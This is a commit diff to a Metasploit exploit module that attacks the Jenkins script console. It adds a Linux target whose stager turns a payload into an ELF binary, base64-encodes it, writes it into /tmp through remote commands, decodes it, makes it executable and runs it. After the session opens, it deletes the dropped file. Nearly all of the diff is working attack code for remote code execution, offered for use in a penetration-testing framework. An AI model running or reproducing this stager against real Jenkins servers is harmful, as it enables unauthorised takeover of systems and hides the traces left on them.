Merge pull request #1 from jvazquez-r7/jenkins_script_console_mod

zeroSteiner · zeroSteiner · commit ae247c1a25c4 · 2013-01-20T10:08:47.000-08:00
Added target for linux stager
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::CmdStagerVBS
+	include Msf::Exploit::FileDropper
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -36,8 +37,9 @@ def initialize(info = {})
 				],
 			'Targets'		=>
 				[
-					['Windows',  {'Arch' => ARCH_X86, 'Platform' => 'win'}],
-					['Unix',     {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
+					['Windows',  {'Arch'  => ARCH_X86, 'Platform' => 'win'}],
+					['Linux',    { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+					['Unix CMD', {'Arch'  => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}]
 				],
 			'DisclosureDate' => 'Jan 18 2013',
 			'DefaultTarget'  => 0))
@@ -46,7 +48,7 @@ def initialize(info = {})
 			[
 				OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
 				OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
-				OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]),
+				OptString.new('TARGETURI', [ true,  'The path to jenkins', '/jenkins/' ]),
 			], self.class)
 	end
 
@@ -62,6 +64,13 @@ def check
 		end
 	end
 
+	def on_new_session(client)
+		if not @to_delete.nil?
+			print_warning("Deleting #{@to_delete} payload file")
+			execute_command("rm #{@to_delete}")
+		end
+	end
+
 	def http_send_command(cmd, opts = {})
 		request_parameters = {
 			'method'    => 'POST',
@@ -100,9 +109,35 @@ def java_craft_runtime_exec(cmd)
 	end
 
 	def execute_command(cmd, opts = {})
+		vprint_status("Attempting to execute: #{cmd}")
 		http_send_command("#{cmd}")
 	end
 
+	def linux_stager
+		cmds = "echo LINE | tee FILE"
+		exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+		base64 = Rex::Text.encode_base64(exe)
+		base64.gsub!(/\=/, "\\u003d")
+		file = rand_text_alphanumeric(4+rand(4))
+
+		execute_command("touch /tmp/#{file}.b64")
+		cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
+		base64.each_line do |line|
+			line.chomp!
+			cmd = cmds
+			cmd.gsub!(/LINE/, line)
+			execute_command(cmds)
+		end
+
+		execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
+		execute_command("chmod +x /tmp/#{file}")
+		execute_command("rm /tmp/#{file}.b64")
+
+		execute_command("/tmp/#{file}")
+		@to_delete = "/tmp/#{file}"
+	end
+
+
 	def exploit
 		@uri = target_uri
 		@uri.path = normalize_uri(@uri.path)
@@ -138,10 +173,12 @@ def exploit
 		when 'win'
 			print_status("#{rhost}:#{rport} - Sending VBS stager...")
 			execute_cmdstager({:linemax => 2049})
-
 		when 'unix'
 			print_status("#{rhost}:#{rport} - Sending payload...")
 			http_send_command("#{payload.encoded}")
+		when 'linux'
+			print_status("#{rhost}:#{rport} - Sending Linux stager...")
+			linux_stager
 		end
 
 		handler
